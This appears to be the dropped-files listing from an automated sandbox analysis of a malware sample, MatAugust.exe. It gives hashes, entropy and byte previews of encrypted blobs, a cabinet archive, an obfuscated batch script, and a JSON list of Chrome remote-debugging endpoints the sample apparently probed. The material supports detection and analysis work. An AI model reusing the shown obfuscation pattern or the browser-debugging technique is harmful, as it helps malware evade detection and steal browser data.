C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Calgary

Download File

Process:	C:\Users\user\Desktop\MatAugust.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	7.997262865447932
Encrypted:	true
SSDEEP:	1536:e+KIC/ydQFnJTawXDjJLu+017Kzf/MrKG6WKe9K1NhI:e+knFZawXDJu+04zMaKKbK
MD5:	FA838CB191E7D5CC784EEA716E1A28BA
SHA1:	7D57DB8B9B6FFBDC6102C39FBEF2549EBBE8B3A1
SHA-256:	912B15128A05C56ECADB5E267F783DBB933925BFA40AF96E9866750EEC91C5FB
SHA-512:	7E8AD4066AC360C20235D5FD84C42E73E8F0265C077DC4A8979EDA3B71592C0468C972F769DAFDD6E122A60457436711FC6A09A89578D97912F1F7F24F96E618
Malicious:	false
Preview:	Li.......a..$S..q .8`FY......BF....!....Q..H/] ...........on;n..y.. ..3.(....G...V....L.......t....~..Lw...>....>..b....z:QM...H..<..i2.x...........h.....j..eG.T&A._..Md..J..'+..q.e..+../....I....b...H.U\|....[....'.!".g..2.]..N.n.B.}R...}kYV......(.^.v.I.vP#=...f...m.T..[u0HE.Q.R9......:..Z+...(48.6..{.....`.7M.p..O....pg..8.f.......?.P}.4......Z.~...g.&...;E..L.H....75.J.a;M...5..............I..j....U.`..s.o.._6~.".H.......J.r$......F..6.k....v..g....D5"..18cB..'e..d#....,q...q.I..b..]!.......N/..3..8..7U.. ..,..V.(Y..:q..._~<f.34.$h...}..Y..A/9...5].%.F.ZV..j\.y.-...y..9.B..%.~......Y...I..6s.E....'\|...)....w.,......u..N.F........'.k..`..c....[...\NT8g....qA.k..C..0>U.$......?.b.....[Gv.l.dO.G...%.8.g.Kd.&;.IV.T......k.q.....m...F.q.My.$.0R)4..f..........3.....,y.!....;... Xl."4.....~J....[..s4.>^nV.w.....9...}q{.$.rH=#.g4.A!..^.....U.`..'i..G.Q3.U}...h..S.....6...LP!~y.T.......]J(.....1f...m(..Y.u.f..:..kZ....y....to..t....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Capitol

Download File

Process:	C:\Users\user\Desktop\MatAugust.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	7.996710578054751
Encrypted:	true
SSDEEP:	1536:/cLNs2ayQq+KbIch2cQ2NS462RvrflNJQbhEedO49/EH0M7T:/Ks2Z+kh2cQTozvWCeB9sH0M/
MD5:	88A32DF36A389B373F6A3AE7CF7B3601
SHA1:	1463FF2B0E88B2167B368807BFFB8638C5EB3675
SHA-256:	81A4A1A43B601F743F83477953DFCCBF8B38E96FA886BF59BAFA1C35E2F1AF1A
SHA-512:	8A8ED67C18C13E2B808351612CDF997C8303A972192A065403A2230FFD3BBACD4183183F01D51585C8CCE710C4602055DD33E98D97FAD2693A0BD76DD106F75B
Malicious:	false
Preview:	l.V.[.A..{ ^[.$.....O.l..r.L.........c.a~...Kb,....... .P-.u.L......T.nl.:7.&.Kh..f...3h\8../=...<.P.mH8....(A\,t(..v..e..Fn....:..3.@.Q.>{$...e.[..\$zBw.{.....E......o.lC....Ngd.X.I......l...+.._.)S..F.@.0.ie@Lp_.o"....O.QUvf.6....bs;.J...-...p.43O`a.Z3H...F...E..%...4:/...-...FH@.N36..nA.s...k...9./..A.b./..0@.<..+...........Bu.5X.f>.<C...<....l..Jr....>+9.....aN.../.~.F(qh!..v5&.....+..5..s.+....K.....f..W.'.\|s..u.....@....M..%...A.5].af.H....Fa.....c\|".s$3..).t....`....#..4...;.o.L.<.. ....c..k.w.h.yV..U.Z....b.$D.m.. q......C&.4.RJQW....l.:.a\|R%.2...U..-..(S.B...qd-q....+.X.....+....l..ap<.#..^6...H......0w%..a]FW\|..C......877 .K...x..J...G+R.rS...Deu.?G.;..x..[.. ....:$w.4...Iv.@..2\.c@.B2.`...M.0.4}.A...>..gs.....>b#r.4ina69.B..".b.....h..P.vl.).N..bM.!...1..3..].H../W...]g.8..G.G....q^{......PtE$..e...r6L.D5.E:...#.%.Z.]....._.@0....m]..R.o..0`3Q..^_E.8V..-.L...] ..c.;.>/...G..[Y......vp.>..r...'gu..8....n...V.....,kt..$....a.\...R..@.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Contractors

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	2869
Entropy (8bit):	5.4942980784328395
Encrypted:	false
SSDEEP:	48:u9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+MAyKnFHbgo:GSEA5O5W+MfH5S1CqlVJcI6mlbt
MD5:	E902242D6D6187CB550740E76EDFDAB0
SHA1:	7C831A672A2944F2CE86C342DCFF1DF1792FC973
SHA-256:	D83D5FDBCA8C77C9B44AD1F4E087D157A2BE247F7365057D347E4F0CC3BDED29
SHA-512:	4314C5CD1E441AD598932DAFC569CD662EFAA62DA100572FF1AE592BE61B6E03F3828768FE92E1F1EDA4313E10385FE4BB62A35FDE1C2FBE5F31A4771951CC35
Malicious:	false
Preview:	slovenia........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Convinced

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	84992
Entropy (8bit):	6.683663498512176
Encrypted:	false
SSDEEP:	1536:bEYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2Y:nWy4ZNoGmROL7F1G7ho2Y
MD5:	7EA34E820EDCBE14DFF79768AE48B8D8
SHA1:	BD486B4AFE4C98B3C082DCEB49D324C7A1D76920
SHA-256:	01588CD28C0E00145BF2AA534B1701C56D8E1853617D8C1635A7FE4F09412AD7
SHA-512:	37649D8305EAE0BD4EC35CB85A5EA7E371353C3275641786D30B7AE81EE7A4BDFE51E97C1BB1AEA8FEDC5806E8CDC7B84712DB781106F31659CEEA8942C188B9
Malicious:	false
Preview:	.o.n.....".E.n.d.W.i.t.h.". .m.i.s.s.i.n.g. .".W.i.t.h."...!.B.a.d.l.y. .f.o.r.m.a.t.t.e.d. .".F.u.n.c.". .s.t.a.t.e.m.e.n.t.....".W.i.t.h.". .m.i.s.s.i.n.g. .".E.n.d.W.i.t.h."...(.M.i.s.s.i.n.g. .r.i.g.h.t. .b.r.a.c.k.e.t. .'.).'. .i.n. .e.x.p.r.e.s.s.i.o.n.....M.i.s.s.i.n.g. .o.p.e.r.a.t.o.r. .i.n. .e.x.p.r.e.s.s.i.o.n...".U.n.b.a.l.a.n.c.e.d. .b.r.a.c.k.e.t.s. .i.n. .e.x.p.r.e.s.s.i.o.n.....E.r.r.o.r. .i.n. .e.x.p.r.e.s.s.i.o.n.....E.r.r.o.r. .p.a.r.s.i.n.g. .f.u.n.c.t.i.o.n. .c.a.l.l.......>.".S.e.l.e.c.t.". .s.t.a.t.e.m.e.n.t. .i.s. .m.i.s.s.i.n.g. .".E.n.d.S.e.l.e.c.t.". .o.r. .".C.a.s.e.". .s.t.a.t.e.m.e.n.t...+.".I.f.". .s.t.a.t.e.m.e.n.t.s. .m.u.s.t. .h.a.v.e. .a. .".T.h.e.n.". .k.e.y.w.o.r.d... .B.a.d.l.y. .f.o.r.m.a.t.e.d. .S.t.r.u.c.t. .s.t.a.t.e.m.e.n.t...".C.a.n.n.o.t. .a.s.s.i.g.n. .v.a.l.u.e.s. .t.o. .c.o.n.s.t.a.n.t.s.....C.a.n.n.o.t. .m.a.k.e. .e.x.i.s.t.i.n.g. .v.a.r.i.a.b.l.e.s. .i.n.t.o. .c.o.n.s.t.a.n.t.s...9.O.n.l.y. .O.b.j.e.c.t.-.t.y.p.e. .v.a.r.i.a.b.l.e.s. .a

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Differential

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	81920
Entropy (8bit):	6.638976759220818
Encrypted:	false
SSDEEP:	1536:zaVmoJiKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmESQ:umowS2u5hVOoQ7t8T6pUkBJR8CThpmEv
MD5:	93FDD093C07952E4A3A5D6C5B631B56E
SHA1:	593820850A19765EA5385C26F8495837584F4311
SHA-256:	D63E1719C1FC062751AF09859D31867CFC3E5A877F907836B1FB07CF85326544
SHA-512:	8F628A637462C567E5267FACCBDED9F51AFF0018BC4AD8F7DE280908119450AFED942FD754B9C25881BCA285C16F7B3DCEF5A7D1E6196629F937454591ADC848
Malicious:	false
Preview:	j....E.,...[..09}.t.f;u.u.f....f;.u.j,^f.0B..Qf98u.^[_]...U..E..H...t..u....u..u..u..u.Q.P.....@..]...U..E..H...t..u....u..u.Q.P.....@..]...U..E..H...t..u...Q.P.....@..]...U.....E...\SVW..uG.E..t7.E..x..u`.u ..t.V..p.I.j.Xf...E..@..F.3........................U.3.9z........M.k...B..I..L$$.\$ ;L.0t.......u......t$..........t$ .B.j$.D. ^f9t...t$.un.E.j$.p.+.N....0Xf9........D$XP..l.I..F..T$XRW.\|$h.\|$l..WP.Q(.D$`.........t$.H...D$XP.t$...p.I..L$$.U..\|$`.\|$dC;...p...3..j.Z.........Q.]\|..Y.D$(3.j.Z...........Q.B\|..Yj..D$03.Y....j....3.....X.........Q..\|..Y..t;..0.p..t$..t$<9\|$.v*...}........u....D$XP..p.I.......;....\|$..\$.3.j.Z...........Q.{..Y.D$.3.j.Z...........Q.{....\|$8..T$4Y9D$$.......L$.....t$(C........j$.\$<f..^.t$0.<..u..<..V.+.E.J......@..t$$.D. .t$8..D...D$ ....D$H.D$ ....D$..D$@.D$ .D$ .d$ ....^f;.t$........D$@$@..f;D$@.......t$........PR.D$D.=.....u-jHX.t$8f9D$ uh.D$H%.@.........D$.......L$.....T$.j.Xf;.......j...X......D$.W....W....p.I..L$.j.X.w.f..3..4..t$..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Expertise

Download File

Process:	C:\Users\user\Desktop\MatAugust.exe
File Type:	ASCII text, with very long lines (668), with CRLF line terminators
Category:	dropped
Size (bytes):	17681
Entropy (8bit):	5.13680329715104
Encrypted:	false
SSDEEP:	384:oKGrszoVVDtMK4KT2aQIDM1TdzPfYm9+/Eeohyj9jnPZuq8WKLCLgmFVOEwb:5GfHm+2zIDM1Td7YZ/EeJoqcLygv
MD5:	5F2242BA7A460ADB56E3BBC268F38388
SHA1:	56849F00B2DD8D37EE95B4C1D0831FB71BE1D4F3
SHA-256:	4A7815E89C58EE59514D1D1ADF9890E8E1AE625A2D17AAB2F771AEA43B0FF467
SHA-512:	5696664360EB710CEF5E90F3DC9CBC16774D743BFEBF70B6FA7A1D2DA24C8D0DAFBB5CF5F7D39FC9E7B698B8DEE97AEFF3C74DE78A3067878EC480C7E34E8CD1
Malicious:	false
Preview:	Set Somewhere=i..ImQSys-Attitude-Mv-Welsh-Ps-..DZUArrest-Cisco-Italic-Regulatory-..iLSmooth-Ya-Champagne-Analyzed-..XhHSOldest-Susan-Biological-..QbAnnotation-Polls-Best-Boards-Strikes-Hotel-..CdRabbit-..rUSells-Dev-Photos-Sing-Fee-Sponsor-Ex-..KeNFound-Agree-Exempt-..swpiOpportunities-Engines-Watching-Milfhunter-Styles-..vTCSeven-Goal-Stupid-Baker-..Set Terrorists=l..MRPrRequire-Soldier-Pct-Expense-Cars-..mMqoBeat-Singing-Going-Toner-Communications-Diverse-Update-Liquid-..orIConferences-Chen-Blackjack-Eve-Deluxe-Cst-..xpoSAuthorization-Neon-Sit-Calibration-Operation-Divided-Hacker-Suddenly-Minimize-..XzScott-Islamic-Tion-Du-..gJoCandidate-..Set Metallic=6..iEAnalytical-..ujbSpecifically-Lip-Leu-Vietnam-Tells-Punch-Bd-Fields-Endorsed-..WTMerit-Shopzilla-Classics-Radio-Dice-Personality-Gregory-Locate-..zOStation-Nudity-Hampton-Interior-Enhancing-Annex-Cube-Strange-..WlNIr-..cNNicholas-Pill-Halfcom-Entrance-..hTSurgical-Monetary-Applying-Houses-Refinance-Charlie-Reliability-..eyTanzania-

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Expertise.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (668), with CRLF line terminators
Category:	dropped
Size (bytes):	17681
Entropy (8bit):	5.13680329715104
Encrypted:	false
SSDEEP:	384:oKGrszoVVDtMK4KT2aQIDM1TdzPfYm9+/Eeohyj9jnPZuq8WKLCLgmFVOEwb:5GfHm+2zIDM1Td7YZ/EeJoqcLygv
MD5:	5F2242BA7A460ADB56E3BBC268F38388
SHA1:	56849F00B2DD8D37EE95B4C1D0831FB71BE1D4F3
SHA-256:	4A7815E89C58EE59514D1D1ADF9890E8E1AE625A2D17AAB2F771AEA43B0FF467
SHA-512:	5696664360EB710CEF5E90F3DC9CBC16774D743BFEBF70B6FA7A1D2DA24C8D0DAFBB5CF5F7D39FC9E7B698B8DEE97AEFF3C74DE78A3067878EC480C7E34E8CD1
Malicious:	false
Preview:	Set Somewhere=i..ImQSys-Attitude-Mv-Welsh-Ps-..DZUArrest-Cisco-Italic-Regulatory-..iLSmooth-Ya-Champagne-Analyzed-..XhHSOldest-Susan-Biological-..QbAnnotation-Polls-Best-Boards-Strikes-Hotel-..CdRabbit-..rUSells-Dev-Photos-Sing-Fee-Sponsor-Ex-..KeNFound-Agree-Exempt-..swpiOpportunities-Engines-Watching-Milfhunter-Styles-..vTCSeven-Goal-Stupid-Baker-..Set Terrorists=l..MRPrRequire-Soldier-Pct-Expense-Cars-..mMqoBeat-Singing-Going-Toner-Communications-Diverse-Update-Liquid-..orIConferences-Chen-Blackjack-Eve-Deluxe-Cst-..xpoSAuthorization-Neon-Sit-Calibration-Operation-Divided-Hacker-Suddenly-Minimize-..XzScott-Islamic-Tion-Du-..gJoCandidate-..Set Metallic=6..iEAnalytical-..ujbSpecifically-Lip-Leu-Vietnam-Tells-Punch-Bd-Fields-Endorsed-..WTMerit-Shopzilla-Classics-Radio-Dice-Personality-Gregory-Locate-..zOStation-Nudity-Hampton-Interior-Enhancing-Annex-Cube-Strange-..WlNIr-..cNNicholas-Pill-Halfcom-Entrance-..hTSurgical-Monetary-Applying-Houses-Refinance-Charlie-Reliability-..eyTanzania-

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Firewire

Download File

Process:	C:\Users\user\Desktop\MatAugust.exe
File Type:	data
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	7.996560245570289
Encrypted:	true
SSDEEP:	1536:Td2fhO1JnYAnTLFrFUKQ1occS09puJbfQW4TEi0HKj:Td2JO3XFrFUKNc6pUfQFTEi1j
MD5:	16F0EE51BDCDB9E34F5258445C5823B4
SHA1:	13A783CB502C89BC5110798DF4CC1CCE206A0458
SHA-256:	802190C4A814209C41E4354E7B3502C424D3B5A525030F5E18C94256CF19AFB1
SHA-512:	E7B5A56B5B16F96E4CAA265036F2F6F2AD2E7E6AA6168E8CE87CD54C28D145F4E93A1D947090CEA2166FB74B0641C553D9980628D2E50B9E93C56CA1404CB2D0
Malicious:	false
Preview:	........<FeT...[\\Kq.G..a....n........&<.B..$....=M-.5D.<c...a..l:.^ gY..?...(.6(..X#....W...........e........K..s.m.u.vDX..Ta.3z/.R.(...i.n.?...."..>jA..,.!5..S...3H.(I&...-.!M#BD$...&..g....9.o...C.#-+m.........uh...5~.s...%.l.;...cL...$c....!F<......!g..C3.......&..if.V.$...G.W...v.BN.s...l.mPG.tf..u=.H.Q....^L..^.r........m$.(...Z.._^......AW....L.C...x....=...j..P..I..Im........a...4U7.`Z.,..m.`Xb.(.)b/.n...;..=)4W.G....4......{W.?k`1...O..1Q..I.57..w.h.g.gG).C.#x.....c...\|.B.....N.. ..f..U.a.M.T......(4w......k-..nVq......Vjm.......\|GZHJ.F.......v.r..+..........]^.g...68y^.1.._......8.;.S..i%.Y...;.X..........Y.#@........F6B...Y.....M(-. ..V.K{..f.f...M......"..'..<.....i?.P(.Lw...5.iT).w.a..yX.{....#.8.T.W..kM..3...5.>.O.....%..:W]T..n6......}..zL+....v.rYs...7..8...-K@.5.......S2\..6.x....~....c.p...-.Z..!..e..3...g..y.R.@.4.o..L[....s.bS..L.......d[f..o..o..4......_6.y.5V..r`Qi..P.g...XC..K.V...C..]b.k~.....P..V...Z-..y.).C

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Furnished

Download File

Process:	C:\Users\user\Desktop\MatAugust.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	7.996918765534338
Encrypted:	true
SSDEEP:	768:OjCvBtGzV9KjUvgeawEy8QZes7rLgoxzLusGiBEEdWQ9YA3+e5e+mouzwHMt8X3f:jtGckgeD1lTL/XMA3+9+mogV8EDhO
MD5:	6ABA47A5A2F48EF817455C1EBE3C042E
SHA1:	6D40D189E36F328BC047766204C0BDEC0D425224
SHA-256:	F21BDB106D4AAF89D029731C0E66E0E50FA618DF5C243616D5CBEFB9889FBD4B
SHA-512:	B3EE7F7AEEE89A8CFF43D355ED4CFE94A7E1A6A8F05F7A92DE9A5F40211F5980A9281C2BB69B7E755D482BCAFDD5BC3AB9B9E9C78C51A3E18F09A341613324F9
Malicious:	false
Preview:	^.K...S..>..cC.l......=....i..A.K..q....0l.".h.(..P}...,...W....o..7...0b..c..~}Y..^......."..o........g.Li..$.Hk..;..Ig.M.s.h.`.O....g...@Z.E.=.3.c...@......x......Vv...7.z...,...".j.......13.^D.v...F...I.3K..Cs%u...+..Hw..hO.`.[ba.%E..\|.....qO...ag.Z.......e...-i..I.h..Z.C...........s%...}....D...\|8...........Lv....-.V......B.....i.R(.Y....<1>.6G.-%u...-.`.!..........o.fCk...Q{.\.w...D.N!....$..Ps.....ix.,\....P9..!.6..........]+`p..TP<..!.<%..ZR...=f./...s.Oz.%.x.p..1dDI.1Qf....}"....kR.u.......FR.......Q.. ...........[\;LH..gi.............'.Y..CM[.OLY.qgO..\.)Ws..:.L....5..[..$.A...".Qj#....V...T...2..S.t...8...Z\.L.m.z>.66..<0...y.8...v~.Tv..9}_....8.BE..hph.i.*N.!.H..._... .......A.....s......?"\.Xz....X;...j.S.n..:+.}..I9..4h...6L).h..X....\I.h2.0...?/..Y'.....UE..-...r.T....6.x.tN.W.vD1.m...?.Am...Y.r.....g.Hz..\..Id...z..K^.....v\|..............Z..`...O...r..C.&........@..e...{.<.....GTG..........(.w.........o....W..:..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Grab

Download File

Process:	C:\Users\user\Desktop\MatAugust.exe
File Type:	Microsoft Cabinet archive data, 489741 bytes, 11 files, at 0x2c +A "Severe" +A "Zero", ID 8788, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	489741
Entropy (8bit):	7.9984694671870304
Encrypted:	true
SSDEEP:	12288:7nvuSrIs3vwxVDnXbe3MxS4IX+Uc+AR52pDQYhbuREWZKu++Q:DvuSrIs3IDDbbkRXQ+S52pDViSWZK/
MD5:	69273D18BB6B9ABE1CF67E172D75D757
SHA1:	414FCDDE27BD128D90E66E91C7E6AE8E543560CB
SHA-256:	6F707C4D52E60C2FE0727EC81F46A488E149B6CD11257CDC525E5F8B4E1879DB
SHA-512:	7D7994E2E3B3209DEDA2A2C006804BC1AEC5441CF1917E5BBF97A33380B46BF7292E449877807EFBDC7A8F54032B477A4351429F864417B1D844B7301F02C471
Malicious:	false
Preview:	MSCF.....y......,...............T"..<..................Y.f .Severe..8.........Y.f .Zero.+..........Y.f .Passenger..4..+......Y.f .Refugees..@..+5.....Y.f .Differential..T..+u.....Y.f .Removal.....+......Y.f .Born.5...+......Y.f .Contractors..L..`......Y.f .Convinced..(..`......Y.f .Increasingly..T..` .....Y.f .Mph......J..CK...\|..8<.;.,.&.@...D>......H.l.Hpcd..\|`.i.hK..X%.8Y.d...{..-..^..."...`>.B...B4 ......l d..93.I..}....=g...<..:.9s.....9.3....a...n...L...\|.p.Xma8..P..E.....q.t..TU....3.....]D).tZ..v...qAAw.t......Og..J..."............$..k.Za.4..N..J.......1..jWe."..c.WU.T=.w.q. .#3R./.s....Ti..(+..... ...xh#7S(M..@.@.M..B>+;-.6......_.cw..D.S.oV..OZJ......'.3."9k-.b.Ul..O..T:...w...B9..$.;..-nr........4 .(..........Ah....&....Lla.....c.S^.J.; ."2.s.y^...PU/#...PU9V.o..tP.c.L.v.a.@......w..........4r._....x.f....w..:.._.y..o...^}...49......-W...2....wb.G.....bx.?V.o.\|'...b2..F.+.oY..3..i1...t.k..~....Q.b.~....GT.R..pu..P..n^...pu..#........I...H.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Halfcom

Download File

Process:	C:\Users\user\Desktop\MatAugust.exe
File Type:	data
Category:	dropped
Size (bytes):	74752
Entropy (8bit):	7.997740390640038
Encrypted:	true
SSDEEP:	1536:dur+FacAYjuRzeQjh+pdeuEu8FG+qVranYNGhIm+P4uxl4Ch0MfZug+EHFZYK4Xn:e+ocCKQ8pdVuOr8YNG3+PZL0C4g9FKXn
MD5:	7DA2C18A7FB5E11738AE104C18FB0F1A
SHA1:	96953D73116A544556A4F1FA39A7A6C7B33C6E7C
SHA-256:	5C38BFB06730B3AFB3BBDD5E89B34FC25D9853EDECD1234F9AEC419DD8BD15B6
SHA-512:	E1BFD8405AD0C69E4982B6365C8132A385AC37E22D147B1550A626E50F29EE021CC25C4E2ECDC2E29435A9E9976CD630A979ED5DE6C76D2DF56FB1C503121462
Malicious:	false
Preview:	..Xs....3}.3.S='.:.N..`...J.....I....8.>I.a......+.. J?......'-U.(.H._X\...n.i.....QvU.j.;q....C..;. ../.V.).....d.4+.\O..0.K..... ...rvF;....O...........i.V........J...M...M..5.!T.~.I2...9v.....W.@.8P.......0nE.i[..Cy..s...X.......7....=....vs>y\.,......B.%./..p....E.E.....E..m.....z......!....8(..p....Z=.n....d..P....V.(.f$nMP..C..@...R.V&X~N.....F04b)...3..]....P..\|s...:B.z...c.......G.......t....`.Q.:...sNuY...4...s+.1...+...C....?F..b)...-..X+..Bl..r.k!...[7.................\o.... ..H.7/.~..@7[..w....>....;.2.\..B....%....H..&'......#..Ol.23........!.Nl..Qt..%.`.K......Cf.....3....S.G.jd...2...l6..:...C<B"$7...M.d+....<...C.8..=c...YX.......k....i..sV.P.U....qe.&x.?%.T'.,4....f..:6.........Q....0..Q..R A.-...5"......m.l"G...................).M.U.i8......2^.....`...C.VP..G.../A.g..Q>..U..}.....f../...]Y.@h.{Y}.!l....(..A.w.F..]....:...?m.5..J.;?O..o.W.`.aZ.>.:CsD*T~.........hl..S@J.....(...Ae.....0..if.Oz..g....TK.F..IA.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.381587468686939
Encrypted:	false
SSDEEP:	48:SfNaoCUU5TECUnfNaoC0CTfNaoCpC/fNaoCxX0UrU0U8Co:6NnCUU5TECUfNnC0CLNnCpCXNnCxX0UV
MD5:	436FE6C3978620217A4E2982D3984BF7
SHA1:	FE5FB2554BE8320A4585EE17438974BA6625794B
SHA-256:	80804663ABB7AF5F52473DEF3F7B1BD3D53AE8E824AEFB4BF9C8836230BE02CB
SHA-512:	F2F3CE5FACA627F3E47DF2230C3F852E233AB7DE1F6AA7CA79FF32138A8FDC2BFE93186ACFB2C2B8052920222B39FA40B41F6F1DD31B6B2FD5D786E88C2C0902
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/0C8837914A7878A38138AFB609AB0592",.. "id": "0C8837914A7878A38138AFB609AB0592",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/0C8837914A7878A38138AFB609AB0592"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/4EC0712CDD98E6EF66693ABF8308C47F",.. "id": "4EC0712CDD98E6EF66693ABF8308C47F",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/4EC0712CDD98E6EF66693ABF8308C47F"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Increasingly

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	141312
Entropy (8bit):	6.191432447608067
Encrypted:	false
SSDEEP:	3072:AzW9FfTut/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtsa:AzWWt/Dd314V14ZgP0JaAOz04phdya
MD5:	0A145CC0A96E5CA92E4EF959E5DE2BC8
SHA1:	86C70E9A7307AB27F5BA2AAD61351BD36B25B10E
SHA-256:	F1044DA89B01FE779139B3AB70CB601080E5A5BE06D5B46B0650B5C68548813D
SHA-512:	43484843602F6AFAC95BF2759C57D7821B0FEB404E1B50279D89EAF826C6A779B5B1A6CAE865C7379C1CBF5D765A4840162F2C7D0D8A8C2C72A133E6DE4BEC1F
Malicious:	false
Preview:	.......`.L..L$ .......t8.G..p....nw...L$..D$0P.v..(....M..D$..D$0P.c...D$...... .L..L$ .......t..G..p....$w...v..L$.......I....P9L..L$ ......t..G..p.....v...v..L$.......:.@.L..L$ .j.....t..G..p.....v..S.\|....u........F.........t$...u)...H..D1.8\1.t..@8.@......D1.8\1.t..@8.X..L$@.R....L$ .A....L$0.8..._^3.[..]...U..U.V........J.....,....teR.......j....7......By*...Q..\|2...L2.t..I8..A..\|2...D2.t..@8.@...u.........&..F.....................3.^]...U......DS.].V...D$...I.3.C.AW.D$.3..L$<...L$,.L$0h.L..D$4.D$<.D$..D$..D$ .D$$.D$,.R...M.h..I..R..h..I..L$$.R...C..L$..0.`...\|$...L$.r..C..p....D$ P.l`...D$0P.L$..^`...D$...P.k.....u....H..\|1...D1.t..@8.@......\|1...D1.t..@8.@...w.\|$..u..C..H.....x..L$@.u..........D$@PW.I.....t..M..D$@P..`...,...H..\|1...D1.t..@8.@......\|1...D1.t..@8.@...L$@.A....L$ .@....L$..D$...I...^...t$......Y.L$0....._^3.[..]...U.........S.].3.VW...D$(.s..t$ .D$,.D$$.D$..D$0.D$....r'.C.j).H..L$H......u...s...L$D.A....D$(...r..C.j).H......u.....D$,...rV.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Mph

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	87040
Entropy (8bit):	6.579684886442836
Encrypted:	false
SSDEEP:	1536:Un+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bN:U+AqVnBypIbv18mLthfhnueoMmOqDoiR
MD5:	D68F4D9FDC2A39C154E763318E13AD79
SHA1:	6534EF7A8A74C7A4E3487D304A88E8511A518CE7
SHA-256:	0BA592D7FD02B59D73D971C63EF320D4F94A349AF352EEBE792698258B9FFFA2
SHA-512:	C07C27ED4622B7AB1D117C0A36C72170C820C04E12A8D5CF4A1AE21ADFEB73AABCBDE3B680178E6797533485253F290613CFBBC6D30D3EDA5E5CB9B118810156
Malicious:	false
Preview:	....uU.L$..d#...t$$.\|$..B.L$..Q#...E....L$..C#...E..t$$.D$....5.)M..L$..'#...t$.3..D$$....F.D$.P.L$,.j....L$....0)M.A.L$.;...p....\|$.Q.D$..\$.PQS.D$H.0$M.P.D$<Ph )M..e*....t.95,%M.t..=,%M.8\$.t<.L$8......L$(.D$(..I..)....t$,.p=..Y.L$.."...L$8.y"...../.L$(.D$(..I.......t$,.?=..Y.L$..Q"...L$8.H"..3._^[..]...U......<SV3.W.=,%M.F.\|$.;........=g#M.........u.3.0$M...,%M.......L$..y....~....\$8.\$@.t$D.\$..\$ .t$$.D$(..I..\$,.\$0.\$49Y.~y....+.t=...t&...t....uF.L$..!...E..,.L$..!...E....L$..}!...E..t$$...L$..k!...E..D$$.....D$..D$.P.L$,....D$.G;x.\|..\|$.Q.D$..\$.PQS.D$H.0$M.P.D$<P.u..(....t795,%M.t/.\|$D..=,%M.uU.L$8......D$@h.~L..0....YY..u6j.[..L$(.D$(..I..c....t$,.;..Y.L$.. ...L$8. .....E8\$.t..L$8.....M....L$(.D$(..I.......t$,.c;..Y.L$..u ...L$8.l ..3._^[..]...U..S.].V..W....K..C..F...tP...s.j.X3.F.j.Z.........Q..;..3..F.Y9~.v.j...:..Y.K.........J..H..N....G;~.r...3..~..~._..^[]...U..V.u.W.......OD.F..G..F..G..F..G..F..G..F..G..F..G..F..G..F .G .F$.G$.F(.G(.F,.G,...F0.G

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Nj

Download File

Process:	C:\Users\user\Desktop\MatAugust.exe
File Type:	data
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	7.996556964697908
Encrypted:	true
